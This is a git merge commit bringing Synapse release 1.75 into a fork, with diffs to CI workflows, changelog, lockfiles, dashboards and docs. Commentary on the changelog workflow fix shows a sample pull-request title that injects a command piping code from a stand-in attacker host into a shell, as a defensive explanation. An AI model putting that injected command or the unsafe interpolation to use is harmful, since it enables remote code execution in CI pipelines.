Merge remote-tracking branch 'upstream/release-v1.75'

Tulir Asokan, 2023-01-19 15:42:39 +02:00
commit 2830d33724
148 changed files with 4230 additions and 2236 deletions

.flake8 (18 lines removed)

@@ -1,18 +0,0 @@
# TODO: incorporate this into pyproject.toml if flake8 supports it in the future.
# See https://github.com/PyCQA/flake8/issues/234
[flake8]
# see https://pycodestyle.readthedocs.io/en/latest/intro.html#error-codes
# for error codes. The ones we ignore are:
# W503: line break before binary operator
# W504: line break after binary operator
# E203: whitespace before ':' (which is contrary to pep8?)
# E731: do not assign a lambda expression, use a def
# E501: Line too long (black enforces this for us)
#
# flake8-bugbear runs extra checks. Its error codes are described at
# https://github.com/PyCQA/flake8-bugbear#list-of-warnings
# B019: Use of functools.lru_cache or functools.cache on methods can lead to memory leaks
# B023: Functions defined inside a loop must not use variables redefined in the loop
# B024: Abstract base class with no abstract method.
ignore=W503,W504,E203,E731,E501,B019,B023,B024
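
This suppression list does not simply vanish: per the changelog below, flake8 is replaced by ruff (#14633, #14741), which reads its configuration from `pyproject.toml`, resolving the TODO at the top of this file. A rough sketch of where the surviving codes land, assuming ruff's `[tool.ruff]` table (the exact list kept in this commit may differ):

```toml
# Sketch only: carrying the old flake8 ignores over to ruff.
# Ruff does not implement every pycodestyle warning (W503/W504 among them),
# so only the codes it does implement need suppressing.
[tool.ruff]
line-length = 88   # matches black, which already enforces E501
ignore = [
    "E501",  # line too long (black enforces this for us)
    "E731",  # do not assign a lambda expression, use a def
    "B019",  # functools.lru_cache/cache on methods can leak memory
    "B023",  # function defined inside a loop uses a loop variable
    "B024",  # abstract base class with no abstract method
]
```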

@@ -6,7 +6,7 @@ on:
- reopened # For debugging!
permissions:
# Needed to be able to push the commit. See
# https://docs.github.com/en/code-security/dependabot/working-with-dependabot/automating-dependabot-with-github-actions#enable-auto-merge-on-a-pull-request
# for a similar example
contents: write
@@ -20,8 +20,11 @@ jobs:
with:
ref: ${{ github.event.pull_request.head.ref }}
- name: Write, commit and push changelog
env:
PR_TITLE: ${{ github.event.pull_request.title }}
PR_NUMBER: ${{ github.event.pull_request.number }}
run: |
echo "${{ github.event.pull_request.title }}." > "changelog.d/${{ github.event.pull_request.number }}".misc
echo "${PR_TITLE}." > "changelog.d/${PR_NUMBER}".misc
git add changelog.d
git config user.email "github-actions[bot]@users.noreply.github.com"
git config user.name "GitHub Actions"
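
The rewritten step above is the standard GitHub Actions hardening against script injection: `${{ ... }}` expressions are substituted into the script text before the shell runs, so an attacker-controlled PR title could smuggle commands into a workflow that holds a `contents: write` token. Routing the values through `env:` keeps them as plain data. A sketch of the difference (the PR title below is hypothetical):

```yaml
steps:
  # UNSAFE: the expression is expanded into the script source first, so a
  # PR titled   a"; curl https://evil.example | sh; echo "   would execute.
  - run: echo "${{ github.event.pull_request.title }}." > "changelog.d/pr.misc"

  # SAFE: the title only ever exists as the value of $PR_TITLE, which the
  # shell expands as data rather than parsing as code.
  - env:
      PR_TITLE: ${{ github.event.pull_request.title }}
    run: echo "${PR_TITLE}." > "changelog.d/pr.misc"
```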

@@ -14,7 +14,7 @@ jobs:
# There's a 'download artifact' action, but it hasn't been updated for the workflow_run action
# (https://github.com/actions/download-artifact/issues/60) so instead we get this mess:
- name: 📥 Download artifact
uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2
uses: dawidd6/action-download-artifact@bd10f381a96414ce2b13a11bfa89902ba7cea07f # v2.24.3
with:
workflow: docs-pr.yaml
run_id: ${{ github.event.workflow_run.id }}

@@ -4,6 +4,8 @@ on:
pull_request:
paths:
- docs/**
- book.toml
- .github/workflows/docs-pr.yaml
jobs:
pages:
@@ -32,3 +34,27 @@ jobs:
path: book
# We'll only use this in a workflow_run, then we're done with it
retention-days: 1
link-check:
name: Check links in documentation
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Setup mdbook
uses: peaceiris/actions-mdbook@adeb05db28a0c0004681db83893d56c0388ea9ea # v1.2.0
with:
mdbook-version: '0.4.17'
- name: Setup htmltest
run: |
wget https://github.com/wjdp/htmltest/releases/download/v0.17.0/htmltest_0.17.0_linux_amd64.tar.gz
echo '775c597ee74899d6002cd2d93076f897f4ba68686bceabe2e5d72e84c57bc0fb htmltest_0.17.0_linux_amd64.tar.gz' | sha256sum -c
tar zxf htmltest_0.17.0_linux_amd64.tar.gz
- name: Test links with htmltest
# Build the book with `./` as the site URL (to make checks on 404.html possible)
# Then run htmltest (without checking external links since that involves the network and is slow).
run: |
MDBOOK_OUTPUT__HTML__SITE_URL="./" mdbook build
./htmltest book --skip-external
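
The same check is easy to reproduce locally; for repeated runs it may be tidier to keep the flag in htmltest's config file instead. A minimal sketch, assuming htmltest's documented `DirectoryPath` and `CheckExternal` options (no such file is added by this commit):

```yaml
# Hypothetical .htmltest.yml mirroring the CI invocation above.
DirectoryPath: book    # scan the rendered mdbook output
CheckExternal: false   # equivalent to the --skip-external flag
```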

@@ -58,7 +58,7 @@ jobs:
# Deploy to the target directory.
- name: Deploy to gh pages
uses: peaceiris/actions-gh-pages@de7ea6f8efb354206b205ef54722213d99067935 # v3.9.0
uses: peaceiris/actions-gh-pages@64b46b4226a4a12da2239ba3ea5aa73e3163c75b # v3.9.1
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
publish_dir: ./book

@@ -208,7 +208,7 @@ jobs:
steps:
- uses: actions/checkout@v3
- uses: JasonEtco/create-an-issue@77399b6110ef82b94c1c9f9f615acf9e604f7f56 # v2.5.0, 2020-12-06
- uses: JasonEtco/create-an-issue@e27dddc79c92bc6e4562f268fffa5ed752639abd # v2.9.1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:

@@ -148,7 +148,7 @@ jobs:
env:
# Skip testing for platforms which various libraries don't have wheels
# for, and so need extra build deps.
CIBW_TEST_SKIP: pp39-* *i686* *musl* pp37-macosx*
CIBW_TEST_SKIP: pp3{7,9}-* *i686* *musl*
# Fix Rust OOM errors on emulated aarch64: https://github.com/rust-lang/cargo/issues/10583
CARGO_NET_GIT_FETCH_WITH_CLI: true
CIBW_ENVIRONMENT_PASS_LINUX: CARGO_NET_GIT_FETCH_WITH_CLI
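
The tightened skip list relies on cibuildwheel's glob patterns supporting brace expansion: `pp3{7,9}-*` covers PyPy 3.7 and 3.9 build identifiers on every platform, replacing the old list that skipped PyPy 3.9 everywhere but PyPy 3.7 only on macOS. Illustratively (the expanded identifiers are examples, not an exhaustive list):

```sh
# How the new pattern is expected to expand:
#   pp3{7,9}-*  ->  pp37-*, pp39-*   e.g. pp37-manylinux_x86_64, pp39-macosx_x86_64
#   *i686*      ->  32-bit x86 builds
#   *musl*      ->  musl-libc (Alpine) builds
CIBW_TEST_SKIP="pp3{7,9}-* *i686* *musl*"
```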

@@ -53,7 +53,7 @@ jobs:
- run: scripts-dev/check_schema_delta.py --force-colors
lint:
uses: "matrix-org/backend-meta/.github/workflows/python-poetry-ci.yml@v1"
uses: "matrix-org/backend-meta/.github/workflows/python-poetry-ci.yml@v2"
with:
typechecking-extras: "all"

@@ -174,7 +174,7 @@ jobs:
steps:
- uses: actions/checkout@v3
- uses: JasonEtco/create-an-issue@77399b6110ef82b94c1c9f9f615acf9e604f7f56 # v2.5.0, 2020-12-06
- uses: JasonEtco/create-an-issue@e27dddc79c92bc6e4562f268fffa5ed752639abd # v2.9.1
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:

.gitignore (1 line changed)

@@ -36,6 +36,7 @@ __pycache__/
# For direnv users
/.envrc
.direnv/
# IDEs
/.idea/

@@ -1,3 +1,113 @@
Synapse 1.75.0 (2023-01-17)
===========================
No significant changes since 1.75.0rc2.
Synapse 1.75.0rc2 (2023-01-12)
==============================
Bugfixes
--------
- Fix a bug introduced in Synapse 1.75.0rc1 where device lists could be miscalculated with some sync filters. ([\#14810](https://github.com/matrix-org/synapse/issues/14810))
- Fix race where calling `/members` or `/state` with an `at` parameter could fail for newly created rooms, when using multiple workers. ([\#14817](https://github.com/matrix-org/synapse/issues/14817))
Synapse 1.75.0rc1 (2023-01-10)
==============================
Features
--------
- Add a `cached` function to `synapse.module_api` that returns a decorator to cache return values of functions. ([\#14663](https://github.com/matrix-org/synapse/issues/14663))
- Add experimental support for [MSC3391](https://github.com/matrix-org/matrix-spec-proposals/pull/3391) (removing account data). ([\#14714](https://github.com/matrix-org/synapse/issues/14714))
- Support [RFC7636](https://datatracker.ietf.org/doc/html/rfc7636) Proof Key for Code Exchange for OAuth single sign-on. ([\#14750](https://github.com/matrix-org/synapse/issues/14750))
- Support non-OpenID compliant userinfo claims for subject and picture. ([\#14753](https://github.com/matrix-org/synapse/issues/14753))
- Improve performance of `/sync` when filtering all rooms, message types, or senders. ([\#14786](https://github.com/matrix-org/synapse/issues/14786))
- Improve performance of the `/hierarchy` endpoint. ([\#14263](https://github.com/matrix-org/synapse/issues/14263))
Bugfixes
--------
- Fix the *MAU Limits* section of the Grafana dashboard relying on a specific `job` name for the workers of a Synapse deployment. ([\#14644](https://github.com/matrix-org/synapse/issues/14644))
- Fix a bug introduced in Synapse 1.70.0 which could cause spurious `UNIQUE constraint failed` errors in the `rotate_notifs` background job. ([\#14669](https://github.com/matrix-org/synapse/issues/14669))
- Ensure stream IDs are always updated after caches get invalidated with workers. Contributed by Nick @ Beeper (@fizzadar). ([\#14723](https://github.com/matrix-org/synapse/issues/14723))
- Remove the unspecced `device` field from `/pushrules` responses. ([\#14727](https://github.com/matrix-org/synapse/issues/14727))
- Fix a bug introduced in Synapse 1.73.0 where the `picture_claim` configured under `oidc_providers` was unused (the default value of `"picture"` was used instead). ([\#14751](https://github.com/matrix-org/synapse/issues/14751))
- Unescape HTML entities in URL preview titles making use of oEmbed responses. ([\#14781](https://github.com/matrix-org/synapse/issues/14781))
- Disable sending confirmation email when 3pid is disabled. ([\#14725](https://github.com/matrix-org/synapse/issues/14725))
Improved Documentation
----------------------
- Declare support for Python 3.11. ([\#14673](https://github.com/matrix-org/synapse/issues/14673))
- Fix `target_memory_usage` being used in the description for the actual `cache_autotune` sub-option `target_cache_memory_usage`. ([\#14674](https://github.com/matrix-org/synapse/issues/14674))
- Move `email` to Server section in config file documentation. ([\#14730](https://github.com/matrix-org/synapse/issues/14730))
- Fix broken links in the Synapse documentation. ([\#14744](https://github.com/matrix-org/synapse/issues/14744))
- Add missing worker settings to shared configuration documentation. ([\#14748](https://github.com/matrix-org/synapse/issues/14748))
- Document using Twitter as an OAuth 2.0 authentication provider. ([\#14778](https://github.com/matrix-org/synapse/issues/14778))
- Fix Synapse 1.74 upgrade notes to correctly explain how to install pyICU when installing Synapse from PyPI. ([\#14797](https://github.com/matrix-org/synapse/issues/14797))
- Update link to towncrier in contribution guide. ([\#14801](https://github.com/matrix-org/synapse/issues/14801))
- Use `htmltest` to check links in the Synapse documentation. ([\#14743](https://github.com/matrix-org/synapse/issues/14743))
Internal Changes
----------------
- Faster remote room joins: stream the un-partial-stating of events over replication. ([\#14545](https://github.com/matrix-org/synapse/issues/14545), [\#14546](https://github.com/matrix-org/synapse/issues/14546))
- Use [ruff](https://github.com/charliermarsh/ruff/) instead of flake8. ([\#14633](https://github.com/matrix-org/synapse/issues/14633), [\#14741](https://github.com/matrix-org/synapse/issues/14741))
- Change `handle_new_client_event` signature so that a 429 does not reach clients on `PartialStateConflictError`, and internally retry when needed instead. ([\#14665](https://github.com/matrix-org/synapse/issues/14665))
- Remove dependency on jQuery on reCAPTCHA page. ([\#14672](https://github.com/matrix-org/synapse/issues/14672))
- Faster joins: make `compute_state_after_events` consistent with other state-fetching functions that take a `StateFilter`. ([\#14676](https://github.com/matrix-org/synapse/issues/14676))
- Add missing type hints. ([\#14680](https://github.com/matrix-org/synapse/issues/14680), [\#14681](https://github.com/matrix-org/synapse/issues/14681), [\#14687](https://github.com/matrix-org/synapse/issues/14687))
- Improve type annotations for the helper methods on a `CachedFunction`. ([\#14685](https://github.com/matrix-org/synapse/issues/14685))
- Check that the SQLite database file exists before porting to PostgreSQL. ([\#14692](https://github.com/matrix-org/synapse/issues/14692))
- Add `.direnv/` directory to .gitignore to prevent local state generated by the [direnv](https://direnv.net/) development tool from being committed. ([\#14707](https://github.com/matrix-org/synapse/issues/14707))
- Batch up replication requests to request the resyncing of remote users' devices. ([\#14716](https://github.com/matrix-org/synapse/issues/14716))
- If debug logging is enabled, log the `msgid`s of any to-device messages that are returned over `/sync`. ([\#14724](https://github.com/matrix-org/synapse/issues/14724))
- Change GHA CI job to follow best practices. ([\#14772](https://github.com/matrix-org/synapse/issues/14772))
- Switch to our fork of `dh-virtualenv` to work around an upstream Python 3.11 incompatibility. ([\#14774](https://github.com/matrix-org/synapse/issues/14774))
- Skip testing built wheels for PyPy 3.7 on Linux x86_64 as we lack new required dependencies in the build environment. ([\#14802](https://github.com/matrix-org/synapse/issues/14802))
### Dependabot updates
<details>
- Bump JasonEtco/create-an-issue from 2.8.1 to 2.8.2. ([\#14693](https://github.com/matrix-org/synapse/issues/14693))
- Bump anyhow from 1.0.66 to 1.0.68. ([\#14694](https://github.com/matrix-org/synapse/issues/14694))
- Bump blake2 from 0.10.5 to 0.10.6. ([\#14695](https://github.com/matrix-org/synapse/issues/14695))
- Bump serde_json from 1.0.89 to 1.0.91. ([\#14696](https://github.com/matrix-org/synapse/issues/14696))
- Bump serde from 1.0.150 to 1.0.151. ([\#14697](https://github.com/matrix-org/synapse/issues/14697))
- Bump lxml from 4.9.1 to 4.9.2. ([\#14698](https://github.com/matrix-org/synapse/issues/14698))
- Bump types-jsonschema from 4.17.0.1 to 4.17.0.2. ([\#14700](https://github.com/matrix-org/synapse/issues/14700))
- Bump sentry-sdk from 1.11.1 to 1.12.0. ([\#14701](https://github.com/matrix-org/synapse/issues/14701))
- Bump types-setuptools from 65.6.0.1 to 65.6.0.2. ([\#14702](https://github.com/matrix-org/synapse/issues/14702))
- Bump minimum PyYAML to 3.13. ([\#14720](https://github.com/matrix-org/synapse/issues/14720))
- Bump JasonEtco/create-an-issue from 2.8.2 to 2.9.1. ([\#14731](https://github.com/matrix-org/synapse/issues/14731))
- Bump towncrier from 22.8.0 to 22.12.0. ([\#14732](https://github.com/matrix-org/synapse/issues/14732))
- Bump isort from 5.10.1 to 5.11.4. ([\#14733](https://github.com/matrix-org/synapse/issues/14733))
- Bump attrs from 22.1.0 to 22.2.0. ([\#14734](https://github.com/matrix-org/synapse/issues/14734))
- Bump black from 22.10.0 to 22.12.0. ([\#14735](https://github.com/matrix-org/synapse/issues/14735))
- Bump sentry-sdk from 1.12.0 to 1.12.1. ([\#14736](https://github.com/matrix-org/synapse/issues/14736))
- Bump setuptools from 65.3.0 to 65.5.1. ([\#14738](https://github.com/matrix-org/synapse/issues/14738))
- Bump serde from 1.0.151 to 1.0.152. ([\#14758](https://github.com/matrix-org/synapse/issues/14758))
- Bump ruff from 0.0.189 to 0.0.206. ([\#14759](https://github.com/matrix-org/synapse/issues/14759))
- Bump pydantic from 1.10.2 to 1.10.4. ([\#14760](https://github.com/matrix-org/synapse/issues/14760))
- Bump gitpython from 3.1.29 to 3.1.30. ([\#14761](https://github.com/matrix-org/synapse/issues/14761))
- Bump pillow from 9.3.0 to 9.4.0. ([\#14762](https://github.com/matrix-org/synapse/issues/14762))
- Bump types-requests from 2.28.11.5 to 2.28.11.7. ([\#14763](https://github.com/matrix-org/synapse/issues/14763))
- Bump dawidd6/action-download-artifact from 2.24.2 to 2.24.3. ([\#14779](https://github.com/matrix-org/synapse/issues/14779))
- Bump peaceiris/actions-gh-pages from 3.9.0 to 3.9.1. ([\#14791](https://github.com/matrix-org/synapse/issues/14791))
- Bump types-pillow from 9.3.0.4 to 9.4.0.0. ([\#14792](https://github.com/matrix-org/synapse/issues/14792))
- Bump pyopenssl from 22.1.0 to 23.0.0. ([\#14793](https://github.com/matrix-org/synapse/issues/14793))
- Bump types-setuptools from 65.6.0.2 to 65.6.0.3. ([\#14794](https://github.com/matrix-org/synapse/issues/14794))
- Bump importlib-metadata from 4.2.0 to 6.0.0. ([\#14795](https://github.com/matrix-org/synapse/issues/14795))
- Bump ruff from 0.0.206 to 0.0.215. ([\#14796](https://github.com/matrix-org/synapse/issues/14796))
</details>
Synapse 1.74.0 (2022-12-20)
===========================

Cargo.lock (generated, 20 lines changed)

@@ -13,9 +13,9 @@ dependencies = [
[[package]]
name = "anyhow"
version = "1.0.66"
version = "1.0.68"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "216261ddc8289130e551ddcd5ce8a064710c0d064a4d2895c67151c92b5443f6"
checksum = "2cb2f989d18dd141ab8ae82f64d1a8cdd37e0840f73a406896cf5e99502fab61"
[[package]]
name = "arc-swap"
@@ -37,9 +37,9 @@ checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a"
[[package]]
name = "blake2"
version = "0.10.5"
version = "0.10.6"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "b12e5fd123190ce1c2e559308a94c9bacad77907d4c6005d9e58fe1a0689e55e"
checksum = "46502ad458c9a52b69d4d4d32775c788b7a1b85e8bc9d482d92250fc0e3f8efe"
dependencies = [
"digest",
]
@@ -323,18 +323,18 @@ checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
[[package]]
name = "serde"
version = "1.0.150"
version = "1.0.152"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "e326c9ec8042f1b5da33252c8a37e9ffbd2c9bef0155215b6e6c80c790e05f91"
checksum = "bb7d1f0d3021d347a83e556fc4683dea2ea09d87bccdf88ff5c12545d89d5efb"
dependencies = [
"serde_derive",
]
[[package]]
name = "serde_derive"
version = "1.0.150"
version = "1.0.152"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "42a3df25b0713732468deadad63ab9da1f1fd75a48a15024b50363f128db627e"
checksum = "af487d118eecd09402d70a5d72551860e788df87b464af30e5ea6a38c75c541e"
dependencies = [
"proc-macro2",
"quote",
@@ -343,9 +343,9 @@ dependencies = [
[[package]]
name = "serde_json"
version = "1.0.89"
version = "1.0.91"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "020ff22c755c2ed3f8cf162dbb41a7268d934702f3ed3631656ea597e08fc3db"
checksum = "877c235533714907a8c2464236f5c4b2a17262ef1bd71f38f35ea592c8da6883"
dependencies = [
"itoa",
"ryu",

@@ -1008,8 +1008,7 @@
"mode": "absolute",
"steps": [
{
"color": "green",
"value": null
"color": "green"
},
{
"color": "red",
@@ -1681,8 +1680,7 @@
"mode": "absolute",
"steps": [
{
"color": "green",
"value": null
"color": "green"
},
{
"color": "red",
@@ -2533,8 +2531,7 @@
"mode": "absolute",
"steps": [
{
"color": "green",
"value": null
"color": "green"
},
{
"color": "red",
@@ -11296,7 +11293,7 @@
"uid": "$datasource"
},
"editorMode": "code",
"expr": "synapse_admin_mau_max{instance=\"$instance\", job=~\"(hhs_)?synapse\"}",
"expr": "max(synapse_admin_mau_max{instance=\"$instance\"})",
"format": "time_series",
"interval": "",
"intervalFactor": 1,
@@ -11310,7 +11307,7 @@
"uid": "$datasource"
},
"editorMode": "code",
"expr": "synapse_admin_mau_current{instance=\"$instance\", job=~\"(hhs_)?synapse\"}",
"expr": "max(synapse_admin_mau_current{instance=\"$instance\"})",
"hide": false,
"legendFormat": "Current",
"range": true,
@@ -12760,6 +12757,6 @@
"timezone": "",
"title": "Synapse",
"uid": "000000012",
"version": 149,
"version": 150,
"weekStart": ""
}

debian/changelog (18 lines changed)

@@ -1,3 +1,21 @@
matrix-synapse-py3 (1.75.0) stable; urgency=medium
* New Synapse release 1.75.0.
-- Synapse Packaging team <packages@matrix.org> Tue, 17 Jan 2023 11:36:02 +0000
matrix-synapse-py3 (1.75.0~rc2) stable; urgency=medium
* New Synapse release 1.75.0rc2.
-- Synapse Packaging team <packages@matrix.org> Thu, 12 Jan 2023 10:30:15 -0800
matrix-synapse-py3 (1.75.0~rc1) stable; urgency=medium
* New Synapse release 1.75.0rc1.
-- Synapse Packaging team <packages@matrix.org> Tue, 10 Jan 2023 12:18:27 +0000
matrix-synapse-py3 (1.74.0) stable; urgency=medium
* New Synapse release 1.74.0.

@@ -36,8 +36,10 @@ RUN env DEBIAN_FRONTEND=noninteractive apt-get install \
wget
# fetch and unpack the package
# We are temporarily using a fork of dh-virtualenv due to an incompatibility with Python 3.11, which ships with
# Debian sid. TODO: Switch back to upstream once https://github.com/spotify/dh-virtualenv/pull/354 has merged.
RUN mkdir /dh-virtualenv
RUN wget -q -O /dh-virtualenv.tar.gz https://github.com/spotify/dh-virtualenv/archive/refs/tags/1.2.2.tar.gz
RUN wget -q -O /dh-virtualenv.tar.gz https://github.com/matrix-org/dh-virtualenv/archive/refs/tags/matrixorg-2023010302.tar.gz
RUN tar -xv --strip-components=1 -C /dh-virtualenv -f /dh-virtualenv.tar.gz
# install its build deps. We do another apt-cache-update here, because we might

@@ -102,6 +102,8 @@ experimental_features:
{% endif %}
# Filtering /messages by relation type.
msc3874_enabled: true
# Enable support for removing account data
msc3391_enabled: true
server_notices:
system_mxid_localpart: _server
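
With the flag enabled, the test homeserver should accept MSC3391's still-unstable account-data deletion endpoints. A hypothetical request, assuming the `org.matrix.msc3391` unstable prefix described in the MSC:

```sh
# Hypothetical: remove a piece of global account data for a test user.
curl -X DELETE \
  -H "Authorization: Bearer $ACCESS_TOKEN" \
  "http://localhost:8008/_matrix/client/unstable/org.matrix.msc3391/user/%40user%3Ahs1/account_data/m.example.setting"
```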

@@ -5,7 +5,7 @@ use it, you must enable the account validity feature (under
`account_validity`) in Synapse's configuration.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## Renew account

@@ -3,7 +3,7 @@
This API returns information about reported events.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
The API is:
```

@@ -6,7 +6,7 @@ Details about the format of the `media_id` and storage of the media in the file
are documented under [media repository](../media_repository.md).
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## List all media in a room

@@ -11,7 +11,7 @@ Note that Synapse requires at least one message in each room, so it will never
delete the last message in a room.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
The API is:

@@ -6,7 +6,7 @@ local users. The server administrator must be in the room and have permission to
invite users.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## Parameters

@@ -5,7 +5,7 @@ server. There are various parameters available that allow for filtering and
sorting the returned list. This API supports pagination.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
**Parameters**
@@ -400,7 +400,7 @@ sent to a room in a given timeframe. There are various parameters available
that allow for filtering and ordering the returned list. This API supports pagination.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
This endpoint mirrors the [Matrix Spec defined Messages API](https://spec.matrix.org/v1.1/client-server-api/#get_matrixclientv3roomsroomidmessages).

@@ -4,7 +4,7 @@ Returns information about all local media usage of users. Gives the
possibility to filter them by time and user.
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
The API is:

@@ -1,7 +1,7 @@
# User Admin API
To use it, you will need to authenticate by providing an `access_token`
for a server admin: see [Admin API](../usage/administration/admin_api).
for a server admin: see [Admin API](../usage/administration/admin_api/).
## Query User Account

@@ -10,7 +10,7 @@ The necessary tools are:
- [black](https://black.readthedocs.io/en/stable/), a source code formatter;
- [isort](https://pycqa.github.io/isort/), which organises each file's imports;
- [flake8](https://flake8.pycqa.org/en/latest/), which can spot common errors; and
- [ruff](https://github.com/charliermarsh/ruff), which can spot common errors; and
- [mypy](https://mypy.readthedocs.io/en/stable/), a type checker.
Install them with:
@@ -28,7 +28,7 @@ scripts-dev/lint.sh
It's worth noting that modern IDEs and text editors can run these tools
automatically on save. It may be worth looking into whether this
functionality is supported in your editor for a more convenient
development workflow. It is not, however, recommended to run `flake8` or `mypy`
development workflow. It is not, however, recommended to run `mypy`
on save as they take a while and can be very resource intensive.
## General rules

@@ -106,8 +106,8 @@ regarding Synapse's Admin API, which is used mostly by sysadmins and external
service developers.
Synapse's code style is documented [here](../code_style.md). Please follow
it, including the conventions for the [sample configuration
file](../code_style.md#configuration-file-format).
it, including the conventions for [configuration
options and documentation](../code_style.md#configuration-code-and-documentation-format).
We welcome improvements and additions to our documentation itself! When
writing new pages, please
@@ -126,7 +126,7 @@ changes to the Rust code.
# 8. Test, test, test!
<a name="test-test-test"></a>
<a name="test-test-test" id="test-test-test"></a>
While you're developing and before submitting a patch, you'll
want to test your code.
@@ -382,7 +382,7 @@ To prepare a Pull Request, please:
## Changelog
All changes, even minor ones, need a corresponding changelog / newsfragment
entry. These are managed by [Towncrier](https://github.com/hawkowl/towncrier).
entry. These are managed by [Towncrier](https://github.com/twisted/towncrier).
To create a changelog entry, make a new file in the `changelog.d` directory named
in the format of `PRnumber.type`. The type can be one of the following:
@@ -424,8 +424,7 @@ chicken-and-egg problem.
There are two options for solving this:
1. Open the PR without a changelog file, see what number you got, and *then*
add the changelog file to your branch (see [Updating your pull
request](#updating-your-pull-request)), or:
add the changelog file to your branch, or:
1. Look at the [list of all
issues/PRs](https://github.com/matrix-org/synapse/issues?q=), add one to the

@@ -59,8 +59,8 @@ namespace (such as anything under `/_matrix/client` for example). It is strongly
recommended that modules register their web resources under the `/_synapse/client`
namespace.
The provided resource is a Python class that implements Twisted's [IResource](https://twistedmatrix.com/documents/current/api/twisted.web.resource.IResource.html)
interface (such as [Resource](https://twistedmatrix.com/documents/current/api/twisted.web.resource.Resource.html)).
The provided resource is a Python class that implements Twisted's [IResource](https://docs.twistedmatrix.com/en/stable/api/twisted.web.resource.IResource.html)
interface (such as [Resource](https://docs.twistedmatrix.com/en/stable/api/twisted.web.resource.Resource.html)).
Only one resource can be registered for a given path. If several modules attempt to
register a resource for the same path, the module that appears first in Synapse's
@@ -82,4 +82,4 @@ the callback name as the argument name and the function as its value. A
`register_[...]_callbacks` method exists for each category.
Callbacks for each category can be found on their respective page of the
[Synapse documentation website](https://matrix-org.github.io/synapse).

@@ -88,98 +88,41 @@ oidc_providers:
display_name_template: "{{ user.name }}"
```
### Dex
### Apple
[Dex][dex-idp] is a simple, open-source OpenID Connect Provider.
Although it is designed to help build a full-blown provider with an
external database, it can be configured with static passwords in a config file.
Configuring "Sign in with Apple" (SiWA) requires an Apple Developer account.
Follow the [Getting Started guide](https://dexidp.io/docs/getting-started/)
to install Dex.
You will need to create a new "Services ID" for SiWA, and create and download a
private key with "SiWA" enabled.
Edit `examples/config-dev.yaml` config file from the Dex repo to add a client:
As well as the private key file, you will need:
* Client ID: the "identifier" you gave the "Services ID"
* Team ID: a 10-character ID associated with your developer account.
* Key ID: the 10-character identifier for the key.
[Apple's developer documentation](https://help.apple.com/developer-account/?lang=en#/dev77c875b7e)
has more information on setting up SiWA.
The synapse config will look like this:
```yaml
staticClients:
- id: synapse
secret: secret
redirectURIs:
- '[synapse public baseurl]/_synapse/client/oidc/callback'
name: 'Synapse'
```
Run with `dex serve examples/config-dev.yaml`.
Synapse config:
```yaml
oidc_providers:
- idp_id: dex
idp_name: "My Dex server"
skip_verification: true # This is needed as Dex is served on an insecure endpoint
issuer: "http://127.0.0.1:5556/dex"
client_id: "synapse"
client_secret: "secret"
scopes: ["openid", "profile"]
- idp_id: apple
idp_name: Apple
issuer: "https://appleid.apple.com"
client_id: "your-client-id" # Set to the "identifier" for your "ServicesID"
client_auth_method: "client_secret_post"
client_secret_jwt_key:
key_file: "/path/to/AuthKey_KEYIDCODE.p8" # point to your key file
jwt_header:
alg: ES256
kid: "KEYIDCODE" # Set to the 10-char Key ID
jwt_payload:
iss: TEAMIDCODE # Set to the 10-char Team ID
scopes: ["name", "email", "openid"]
authorization_endpoint: https://appleid.apple.com/auth/authorize?response_mode=form_post
user_mapping_provider:
config:
localpart_template: "{{ user.name }}"
display_name_template: "{{ user.name|capitalize }}"
```
### Keycloak
[Keycloak][keycloak-idp] is an open-source IdP maintained by Red Hat.
Keycloak supports OIDC Back-Channel Logout, which sends logout notifications to Synapse, so that Synapse users get logged out when they log out from Keycloak.
This can be optionally enabled by setting `backchannel_logout_enabled` to `true` in the Synapse configuration, and by setting the "Backchannel Logout URL" in Keycloak.
Follow the [Getting Started Guide](https://www.keycloak.org/getting-started) to install Keycloak and set up a realm.
1. Click `Clients` in the sidebar and click `Create`
2. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Client Protocol | `openid-connect` |
3. Click `Save`
4. Fill in the fields as below:
| Field | Value |
|-----------|-----------|
| Client ID | `synapse` |
| Enabled | `On` |
| Client Protocol | `openid-connect` |
| Access Type | `confidential` |
| Valid Redirect URIs | `[synapse public baseurl]/_synapse/client/oidc/callback` |
| Backchannel Logout URL (optional) | `[synapse public baseurl]/_synapse/client/oidc/backchannel_logout` |
| Backchannel Logout Session Required (optional) | `On` |
5. Click `Save`
6. On the Credentials tab, update the fields:
| Field | Value |
|-------|-------|
| Client Authenticator | `Client ID and Secret` |
7. Click `Regenerate Secret`
8. Copy Secret
```yaml
oidc_providers:
